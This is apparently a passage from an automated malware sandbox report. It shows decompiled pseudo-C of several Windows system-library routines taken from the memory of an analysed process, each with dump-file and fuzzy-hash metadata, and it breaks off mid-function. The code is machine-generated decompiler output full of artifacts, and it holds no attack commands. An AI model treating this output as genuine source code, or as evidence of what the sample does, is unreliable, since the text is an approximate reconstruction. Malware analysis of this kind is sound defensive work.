                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                            							_t47 =  &_a8;
                            							 *_t47 = _a8 & 0x00000001;
                            							if( *_t47 == 0) {
                            								E037E2280(_t179 + 0x30, _t179 + 0x30);
                            							}
                            							_t147 =  *(_t179 + 0x34);
                            							_t159 =  *(_t179 + 0x38) & 1;
                            							_v68 = 0;
                            							if(_t147 == 0) {
                            								L35:
                            								E037DB090(_t179 + 0x34, _t147, _v68, _t132);
                            								if(_a8 == 0) {
                            									E037DFFB0(_t132, _t177, _t179 + 0x30);
                            								}
                            								asm("lock xadd [eax], ecx");
                            								asm("lock xadd [eax], edx");
                            								_t132 = 0;
                            								_v72 = _v72 & 0;
                            								_v68 = _v72;
                            								if(E037E7D50() == 0) {
                            									_t113 = 0x7ffe0388;
                            								} else {
                            									_t177 = _v64;
                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            								}
                            								if( *_t113 == _t132) {
                            									_t166 = _v68;
                            									goto L46;
                            								} else {
                            									_t166 = _v68;
                            									E0387FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                            									goto L12;
                            								}
                            							} else {
                            								L23:
                            								while(1) {
                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                            										_t122 =  *_t147;
                            										if(_t159 == 0) {
                            											L32:
                            											if(_t122 == 0) {
                            												L34:
                            												_v68 = 0;
                            												goto L35;
                            											}
                            											L33:
                            											_t147 = _t122;
                            											continue;
                            										}
                            										if(_t122 == 0) {
                            											goto L34;
                            										}
                            										_t122 = _t122 ^ _t147;
                            										goto L32;
                            									}
                            									_t122 =  *(_t147 + 4);
                            									if(_t159 == 0) {
                            										L27:
                            										if(_t122 != 0) {
                            											goto L33;
                            										}
                            										L28:
                            										_v68 = 1;
                            										goto L35;
                            									}
                            									if(_t122 == 0) {
                            										goto L28;
                            									}
                            									_t122 = _t122 ^ _t147;
                            									goto L27;
                            								}
                            							}
                            						}
                            					}
                            					_v72 = _v72 & 0x00000000;
                            					goto L11;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction ID: 7abd92f8c87f57e852bef1f8ce9f4e134b5f8dd1a52d49bf77f082c88b41608f
                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction Fuzzy Hash: FD919E352043469FE724EFA9C841B1BB7E5BF84714F1889ADF5A5CB280E774E804CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E038451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed short* _t63;
                            				signed int _t64;
                            				signed int _t65;
                            				signed int _t67;
                            				intOrPtr _t74;
                            				intOrPtr _t84;
                            				intOrPtr _t88;
                            				intOrPtr _t94;
                            				void* _t100;
                            				void* _t103;
                            				intOrPtr _t105;
                            				signed int _t106;
                            				short* _t108;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int* _t115;
                            				signed short* _t117;
                            				void* _t118;
                            				void* _t119;
                            
                            				_push(0x80);
                            				_push(0x38a05f0);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                            				_t115 =  *(_t118 + 0xc);
                            				 *(_t118 - 0x7c) = _t115;
                            				 *((char*)(_t118 - 0x65)) = 0;
                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            				_t113 = 0;
                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                            				_t100 = __ecx;
                            				if(_t100 == 0) {
                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                            					E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					 *((char*)(_t118 - 0x65)) = 1;
                            					_t63 =  *(_t118 - 0x90);
                            					_t101 = _t63[2];
                            					_t64 =  *_t63 & 0x0000ffff;
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					L20:
                            					_t65 = _t64 >> 1;
                            					L21:
                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                            					if(_t108 == 0) {
                            						L27:
                            						 *_t115 = _t65 + 1;
                            						_t67 = 0xc0000023;
                            						L28:
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                            						L29:
                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                            						E038453CA(0);
                            						return E0381D130(0, _t113, _t115);
                            					}
                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                            							 *_t108 = 0;
                            						}
                            						goto L27;
                            					}
                            					 *_t115 = _t65;
                            					_t115 = _t65 + _t65;
                            					E0380F3E0(_t108, _t101, _t115);
                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                            					_t67 = 0;
                            					goto L28;
                            				}
                            				_t103 = _t100 - 1;
                            				if(_t103 == 0) {
                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                            					_t74 = E037E3690(1, _t117, 0x37a1810, _t118 - 0x74);
                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                            					_t101 = _t117[2];
                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                            					if(_t74 < 0) {
                            						_t64 =  *_t117 & 0x0000ffff;
                            						_t115 =  *(_t118 - 0x7c);
                            						goto L20;
                            					}
                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                            					_t115 =  *(_t118 - 0x7c);
                            					goto L21;
                            				}
                            				if(_t103 == 1) {
                            					_t105 = 4;
                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                            					_push(_t118 - 0x70);
                            					_push(0);
                            					_push(0);
                            					_push(_t105);
                            					_push(_t118 - 0x78);
                            					_push(0x6b);
                            					 *((intOrPtr*)(_t118 - 0x64)) = E0380AA90();
                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                            					_t113 = L037E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                            					if(_t113 != 0) {
                            						_push(_t118 - 0x70);
                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                            						_push(_t113);
                            						_push(4);
                            						_push(_t118 - 0x78);
                            						_push(0x6b);
                            						_t84 = E0380AA90();
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                            						if(_t84 < 0) {
                            							goto L29;
                            						}
                            						_t110 = 0;
                            						_t106 = 0;
                            						while(1) {
                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                            							 *(_t118 - 0x88) = _t106;
                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                            								break;
                            							}
                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                            							_t106 = _t106 + 1;
                            						}
                            						_t88 = E0384500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                            						_t119 = _t119 + 0x1c;
                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                            						if(_t88 < 0) {
                            							goto L29;
                            						}
                            						_t101 = _t118 - 0x3c;
                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                            						goto L21;
                            					}
                            					_t67 = 0xc0000017;
                            					goto L28;
                            				}
                            				_push(0);
                            				_push(0x20);
                            				_push(_t118 - 0x60);
                            				_push(0x5a);
                            				_t94 = E03809860();
                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                            				if(_t94 < 0) {
                            					goto L29;
                            				}
                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                            					_t101 = L"Legacy";
                            					_push(6);
                            				} else {
                            					_t101 = L"UEFI";
                            					_push(4);
                            				}
                            				_pop(_t65);
                            				goto L21;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: c029a60bd51a2cfd3690095db8d20dedb505f92acdc137fbf08102fda38b4703
                            • Instruction ID: 2c749176c01b441b69591111c452e37542fae377f905eed7af2761d2d6417d55
                            • Opcode Fuzzy Hash: c029a60bd51a2cfd3690095db8d20dedb505f92acdc137fbf08102fda38b4703
                            • Instruction Fuzzy Hash: DB515EB1A0071D9FDB25DFE88840BADB7F8BB8A704F1440ADE559EB691E6719900CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E037CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                            				signed int _t65;
                            				signed short _t69;
                            				intOrPtr _t70;
                            				signed short _t85;
                            				void* _t86;
                            				signed short _t89;
                            				signed short _t91;
                            				intOrPtr _t92;
                            				intOrPtr _t97;
                            				intOrPtr* _t98;
                            				signed short _t99;
                            				signed short _t101;
                            				void* _t102;
                            				char* _t103;
                            				signed short _t104;
                            				intOrPtr* _t110;
                            				void* _t111;
                            				void* _t114;
                            				intOrPtr* _t115;
                            
                            				_t109 = __esi;
                            				_t108 = __edi;
                            				_t106 = __edx;
                            				_t95 = __ebx;
                            				_push(0x90);
                            				_push(0x389f7a8);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                            				if(__edx == 0xffffffff) {
                            					L6:
                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                            					__eflags = _t65 & 0x00000002;
                            					if((_t65 & 0x00000002) != 0) {
                            						L3:
                            						L4:
                            						return E0381D130(_t95, _t108, _t109);
                            					}
                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                            					_t108 = 0;
                            					_t109 = 0;
                            					_t95 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						__eflags = _t95 - 0x200;
                            						if(_t95 >= 0x200) {
                            							break;
                            						}
                            						E0380D000(0x80);
                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                            						_t108 = _t115;
                            						_t95 = _t95 - 0xffffff80;
                            						_t17 = _t114 - 4;
                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                            						__eflags =  *_t17;
                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                            						_t102 = _t110 + 1;
                            						do {
                            							_t85 =  *_t110;
                            							_t110 = _t110 + 1;
                            							__eflags = _t85;
                            						} while (_t85 != 0);
                            						_t111 = _t110 - _t102;
                            						_t21 = _t95 - 1; // -129
                            						_t86 = _t21;
                            						__eflags = _t111 - _t86;
                            						if(_t111 > _t86) {
                            							_t111 = _t86;
                            						}
                            						E0380F3E0(_t108, _t106, _t111);
                            						_t115 = _t115 + 0xc;
                            						_t103 = _t111 + _t108;
                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                            						_t89 = _t95 - _t111;
                            						__eflags = _t89;
                            						_push(0);
                            						if(_t89 == 0) {
                            							L15:
                            							_t109 = 0xc000000d;
                            							goto L16;
                            						} else {
                            							__eflags = _t89 - 0x7fffffff;
                            							if(_t89 <= 0x7fffffff) {
                            								L16:
                            								 *(_t114 - 0x94) = _t109;
                            								__eflags = _t109;
                            								if(_t109 < 0) {
                            									__eflags = _t89;
                            									if(_t89 != 0) {
                            										 *_t103 = 0;
                            									}
                            									L26:
                            									 *(_t114 - 0xa0) = _t109;
                            									 *(_t114 - 4) = 0xfffffffe;
                            									__eflags = _t109;
                            									if(_t109 >= 0) {
                            										L31:
                            										_t98 = _t108;
                            										_t39 = _t98 + 1; // 0x1
                            										_t106 = _t39;
                            										do {
                            											_t69 =  *_t98;
                            											_t98 = _t98 + 1;
                            											__eflags = _t69;
                            										} while (_t69 != 0);
                            										_t99 = _t98 - _t106;
                            										__eflags = _t99;
                            										L34:
                            										_t70 =  *[fs:0x30];
                            										__eflags =  *((char*)(_t70 + 2));
                            										if( *((char*)(_t70 + 2)) != 0) {
                            											L40:
                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                            											 *(_t114 - 4) = 1;
                            											_push(_t114 - 0x74);
                            											L0381DEF0(_t99, _t106);
                            											 *(_t114 - 4) = 0xfffffffe;
                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            											goto L3;
                            										}
                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                            											goto L40;
                            										}
                            										_push( *((intOrPtr*)(_t114 + 8)));
                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                            										_push(_t99 & 0x0000ffff);
                            										_push(_t108);
                            										_push(1);
                            										_t101 = E0380B280();
                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                            										if( *((char*)(_t114 + 0x14)) == 1) {
                            											__eflags = _t101 - 0x80000003;
                            											if(_t101 == 0x80000003) {
                            												E0380B7E0(1);
                            												_t101 = 0;
                            												__eflags = 0;
                            											}
                            										}
                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            										goto L4;
                            									}
                            									__eflags = _t109 - 0x80000005;
                            									if(_t109 == 0x80000005) {
                            										continue;
                            									}
                            									break;
                            								}
                            								 *(_t114 - 0x90) = 0;
                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                            								_t91 = E0380E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                            								_t115 = _t115 + 0x10;
                            								_t104 = _t91;
                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                            								__eflags = _t104;
                            								if(_t104 < 0) {
                            									L21:
                            									_t109 = 0x80000005;
                            									 *(_t114 - 0x90) = 0x80000005;
                            									L22:
                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                            									L23:
                            									 *(_t114 - 0x94) = _t109;
                            									goto L26;
                            								}
                            								__eflags = _t104 - _t92;
                            								if(__eflags > 0) {
                            									goto L21;
                            								}
                            								if(__eflags == 0) {
                            									goto L22;
                            								}
                            								goto L23;
                            							}
                            							goto L15;
                            						}
                            					}
                            					__eflags = _t109;
                            					if(_t109 >= 0) {
                            						goto L31;
                            					}
                            					__eflags = _t109 - 0x80000005;
                            					if(_t109 != 0x80000005) {
                            						goto L31;
                            					}
                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                            					_t38 = _t95 - 1; // -129
                            					_t99 = _t38;
                            					goto L34;
                            				}
                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                            					__eflags = __edx - 0x65;
                            					if(__edx != 0x65) {
                            						goto L2;
                            					}
                            					goto L6;
                            				}
                            				L2:
                            				_push( *((intOrPtr*)(_t114 + 8)));
                            				_push(_t106);
                            				if(E0380A890() != 0) {
                            					goto L6;
                            				}
                            				goto L3;
                            			}
                            0x038248b5
                            0x038248b7
                            0x038248ba
                            0x038248bc
                            0x038248c6
                            0x038248c6
                            0x038248cb
                            0x038248d1
                            0x038248d4
                            0x038248d8
                            0x038248d8
                            0x00000000
                            0x038248d8
                            0x038248be
                            0x038248c0
                            0x00000000
                            0x00000000
                            0x038248c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x038248c4
                            0x00000000
                            0x03824882
                            0x0382487b
                            0x03824904
                            0x03824906
                            0x00000000
                            0x00000000
                            0x03824908
                            0x0382490e
                            0x00000000
                            0x00000000
                            0x03824910
                            0x03824917
                            0x03824917
                            0x00000000
                            0x03824917
                            0x037cb1ba
                            0x038247f9
                            0x038247fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x038247fc
                            0x037cb1c0
                            0x037cb1c0
                            0x037cb1c3
                            0x037cb1cb
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: _vswprintf_s
                            • String ID:
                            • API String ID: 677850445-0
                            • Opcode ID: a0a3a4741548b83246d7ecc30814061b8855bb6ec59574b7abae792bc25945a3
                            • Instruction ID: 1bda1647696a4b3ecff201a44d3ab069024742f7b44e7c0d074a5a6a62bb8fcb
                            • Opcode Fuzzy Hash: a0a3a4741548b83246d7ecc30814061b8855bb6ec59574b7abae792bc25945a3
                            • Instruction Fuzzy Hash: 6351EF75D142A98ADB31CFAA8840BBEBFB4AF00710F1441EDEC59EB291C37049858BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E037EB944(signed int* __ecx, char __edx) {
                            				signed int _v8;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				signed int* _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				char _v77;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t65;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				char* _t73;
                            				intOrPtr _t77;
                            				intOrPtr _t78;
                            				signed int _t82;
                            				intOrPtr _t83;
                            				void* _t87;
                            				char _t88;
                            				intOrPtr* _t89;
                            				intOrPtr _t91;
                            				void* _t97;
                            				intOrPtr _t100;
                            				void* _t102;
                            				void* _t107;
                            				signed int _t108;
                            				intOrPtr* _t112;
                            				void* _t113;
                            				intOrPtr* _t114;
                            				intOrPtr _t115;
                            				intOrPtr _t116;
                            				intOrPtr _t117;
                            				signed int _t118;
                            				void* _t130;
                            
                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                            				_v8 =  *0x38bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                            				_t112 = __ecx;
                            				_v77 = __edx;
                            				_v48 = __ecx;
                            				_v28 = 0;
                            				_t5 = _t112 + 0xc; // 0x575651ff
                            				_t105 =  *_t5;
                            				_v20 = 0;
                            				_v16 = 0;
                            				if(_t105 == 0) {
                            					_t50 = _t112 + 4; // 0x5de58b5b
                            					_t60 =  *__ecx |  *_t50;
                            					if(( *__ecx |  *_t50) != 0) {
                            						 *__ecx = 0;
                            						__ecx[1] = 0;
                            						if(E037E7D50() != 0) {
                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t65 = 0x7ffe0386;
                            						}
                            						if( *_t65 != 0) {
                            							E03898CD6(_t112);
                            						}
                            						_push(0);
                            						_t52 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t52);
                            						_t60 = E03809E20();
                            					}
                            					L20:
                            					_pop(_t107);
                            					_pop(_t113);
                            					_pop(_t87);
                            					return E0380B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                            				}
                            				_t8 = _t112 + 8; // 0x8b000cc2
                            				_t67 =  *_t8;
                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                            				_t108 =  *(_t67 + 0x14);
                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                            				_t105 = 0x2710;
                            				asm("sbb eax, edi");
                            				_v44 = _t88;
                            				_v52 = _t108;
                            				_t60 = E0380CE00(_t97, _t68, 0x2710, 0);
                            				_v56 = _t60;
                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                            					L3:
                            					 *(_t112 + 0x44) = _t60;
                            					_t105 = _t60 * 0x2710 >> 0x20;
                            					 *_t112 = _t88;
                            					 *(_t112 + 4) = _t108;
                            					_v20 = _t60 * 0x2710;
                            					_v16 = _t60 * 0x2710 >> 0x20;
                            					if(_v77 != 0) {
                            						L16:
                            						_v36 = _t88;
                            						_v32 = _t108;
                            						if(E037E7D50() != 0) {
                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t73 = 0x7ffe0386;
                            						}
                            						if( *_t73 != 0) {
                            							_t105 = _v40;
                            							E03898F6A(_t112, _v40, _t88, _t108);
                            						}
                            						_push( &_v28);
                            						_push(0);
                            						_push( &_v36);
                            						_t48 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t48);
                            						_t60 = E0380AF60();
                            						goto L20;
                            					} else {
                            						_t89 = 0x7ffe03b0;
                            						do {
                            							_t114 = 0x7ffe0010;
                            							do {
                            								_t77 =  *0x38b8628; // 0x0
                            								_v68 = _t77;
                            								_t78 =  *0x38b862c; // 0x0
                            								_v64 = _t78;
                            								_v72 =  *_t89;
                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                            								while(1) {
                            									_t105 =  *0x7ffe000c;
                            									_t100 =  *0x7ffe0008;
                            									if(_t105 ==  *_t114) {
                            										goto L8;
                            									}
                            									asm("pause");
                            								}
                            								L8:
                            								_t89 = 0x7ffe03b0;
                            								_t115 =  *0x7ffe03b0;
                            								_t82 =  *0x7FFE03B4;
                            								_v60 = _t115;
                            								_t114 = 0x7ffe0010;
                            								_v56 = _t82;
                            							} while (_v72 != _t115 || _v76 != _t82);
                            							_t83 =  *0x38b8628; // 0x0
                            							_t116 =  *0x38b862c; // 0x0
                            							_v76 = _t116;
                            							_t117 = _v68;
                            						} while (_t117 != _t83 || _v64 != _v76);
                            						asm("sbb edx, [esp+0x24]");
                            						_t102 = _t100 - _v60 - _t117;
                            						_t112 = _v48;
                            						_t91 = _v44;
                            						asm("sbb edx, eax");
                            						_t130 = _t105 - _v52;
                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                            							_t88 = _t102 - _t91;
                            							asm("sbb edx, edi");
                            							_t108 = _t105;
                            						} else {
                            							_t88 = 0;
                            							_t108 = 0;
                            						}
                            						goto L16;
                            					}
                            				} else {
                            					if( *(_t112 + 0x44) == _t60) {
                            						goto L20;
                            					}
                            					goto L3;
                            				}
                            			}

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037EB9A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 885266447-0
                            • Opcode ID: c2d0e070020fbe03edbf6631f913efb7cc25e613fff4aeaf217ebdd6f57703e5
                            • Instruction ID: 7f89ed7b44d3a33bf285ee4f8d780424e371a7a3ca53f6faf282b5cf21026a8d
                            • Opcode Fuzzy Hash: c2d0e070020fbe03edbf6631f913efb7cc25e613fff4aeaf217ebdd6f57703e5
                            • Instruction Fuzzy Hash: 3A514871A08745CFCB20DF69C4C092AFFE9FB88610F1849AEE5959B354E771E844CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E037F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a1546912635) {
                            				signed int _v8;
                            				signed int _v16;
                            				unsigned int _v24;
                            				void* _v28;
                            				signed int _v32;
                            				unsigned int _v36;
                            				void* _v37;
                            				void* _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _t237;
                            				signed int _t241;
                            				signed int _t272;
                            				signed int _t278;
                            				signed int _t280;
                            				unsigned int _t287;
                            				signed int _t291;
                            				void* _t292;
                            				signed int _t319;
                            				signed int _t321;
                            				signed int _t326;
                            				signed int _t327;
                            				signed int _t333;
                            				signed int _t336;
                            				void* _t337;
                            				signed int _t339;
                            				void* _t340;
                            
                            				_t333 = _t336;
                            				_t337 = _t336 - 0x4c;
                            				_v8 =  *0x38bd360 ^ _t333;
                            				_t326 = 0x38bb2e8;
                            				_v56 = _a4;
                            				_v48 = __edx;
                            				_v60 = __ecx;
                            				_t287 = 0;
                            				_v80 = 0;
                            				asm("movsd");
                            				_v64 = 0;
                            				_v76 = 0;
                            				_v72 = 0;
                            				asm("movsd");
                            				_v44 = 0;
                            				_v52 = 0;
                            				_v68 = 0;
                            				asm("movsd");
                            				_v32 = 0;
                            				_v36 = 0;
                            				asm("movsd");
                            				_v16 = 0;
                            				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                            				_t278 = 0x48;
                            				_t308 = 0 | _t340 == 0x00000000;
                            				_t319 = 0;
                            				_v37 = _t340 == 0;
                            				if(_v48 <= 0) {
                            					L16:
                            					_t45 = _t278 - 0x48; // 0x0
                            					__eflags = _t45 - 0xfffe;
                            					if(_t45 > 0xfffe) {
                            						_t327 = 0xc0000106;
                            						goto L32;
                            					} else {
                            						_t326 = L037E4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
                            						_v52 = _t326;
                            						__eflags = _t326;
                            						if(_t326 == 0) {
                            							_t327 = 0xc0000017;
                            							goto L32;
                            						} else {
                            							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
                            							_t50 = _t326 + 0x48; // 0x48
                            							_t321 = _t50;
                            							_t308 = _v32;
                            							 *(_t326 + 0x3c) = _t278;
                            							_t280 = 0;
                            							 *((short*)(_t326 + 0x30)) = _v48;
                            							__eflags = _t308;
                            							if(_t308 != 0) {
                            								 *(_t326 + 0x18) = _t321;
                            								__eflags = _t308 - 0x38b8478;
                            								 *_t326 = ((0 | _t308 == 0x038b8478) - 0x00000001 & 0xfffffffb) + 7;
                            								E0380F3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                            								_t308 = _v32;
                            								_t337 = _t337 + 0xc;
                            								_t280 = 1;
                            								__eflags = _a8;
                            								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                            								if(_a8 != 0) {
                            									_t272 = E038539F2(_t321);
                            									_t308 = _v32;
                            									_t321 = _t272;
                            								}
                            							}
                            							_t291 = 0;
                            							_v16 = 0;
                            							__eflags = _v48;
                            							if(_v48 <= 0) {
                            								L31:
                            								_t327 = _v68;
                            								__eflags = 0;
                            								 *((short*)(_t321 - 2)) = 0;
                            								goto L32;
                            							} else {
                            								_t278 = _t326 + _t280 * 4;
                            								_v56 = _t278;
                            								do {
                            									__eflags = _t308;
                            									if(_t308 != 0) {
                            										_t237 =  *(_v60 + _t291 * 4);
                            										__eflags = _t237;
                            										if(_t237 == 0) {
                            											goto L30;
                            										} else {
                            											__eflags = _t237 == 5;
                            											if(_t237 == 5) {
